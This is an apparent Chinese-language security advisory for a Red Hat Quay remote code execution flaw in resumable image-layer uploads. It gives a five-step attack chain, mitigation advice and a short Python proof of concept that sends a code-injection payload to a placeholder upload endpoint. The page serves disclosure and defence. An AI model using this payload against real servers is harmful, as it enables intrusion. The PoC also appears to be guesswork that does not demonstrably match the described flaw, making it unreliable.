CVE-2026-32590 CVSS 7.1 高危

CVE-2026-32590 Red Hat Quay远程代码执行漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32590

漏洞类型

远程代码执行

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Red Hat Quay

漏洞概述

Red Hat Quay在处理可恢复容器镜像层上传时存在缺陷。上传过程将中间数据存储在数据库中，若被篡改，攻击者可执行任意代码。该漏洞CVSS 7.1分，需低权限和用户交互，严重威胁机密性、完整性和可用性。

技术细节

漏洞源于Red Hat Quay处理可恢复上传的逻辑。系统将分片上传的中间状态数据存入数据库，但缺乏严格校验。攻击者利用低权限账号，通过构造恶意请求篡改数据库中的中间数据格式。当服务器恢复上传或处理该数据时，由于未对篡改内容进行有效过滤或沙箱隔离，可能解析并执行其中的恶意代码，从而在服务器端实现远程代码执行。

攻击链分析

STEP 1

侦察与访问

攻击者识别目标 Red Hat Quay 实例，并获取一个低权限的用户账号。

STEP 2

初始化上传

攻击者发起一个容器镜像层的上传请求，利用可恢复上传功能建立会话。

STEP 3

篡改数据

在上传过程中，攻击者拦截并修改发送给服务器的中间数据，注入恶意代码或特定的序列化对象。

STEP 4

触发漏洞

服务器处理存储在数据库中被篡改的中间数据，由于校验缺失导致解析并执行恶意代码。

STEP 5

建立控制

攻击者成功在服务器端执行任意命令，获得系统控制权，进而窃取数据或破坏服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (placeholder)
target_url = "https://quay-server.example.com/v2/{repository}/blobs/uploads/{uuid}"

# Malicious payload simulating tampered intermediate data
# This payload attempts to inject arbitrary code execution
tampered_data = {
    "state": "malicious_state",
    "data": "__import__('os').system('id')"
}

# Headers including authentication token
headers = {
    "Authorization": "Bearer <token>",
    "Content-Type": "application/json"
}

try:
    # Send the tampered data during the upload process
    response = requests.patch(target_url, json=tampered_data, headers=headers, verify=False)
    
    if response.status_code == 202 or response.status_code == 201:
        print("[+] Payload sent successfully. Check for execution.")
    else:
        print(f"[-] Failed to send payload. Status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Red Hat Quay (具体受影响版本请参考 RHSA-2026:19375)

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应严格限制上传功能的使用，并加强对数据库中间数据的完整性校验。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表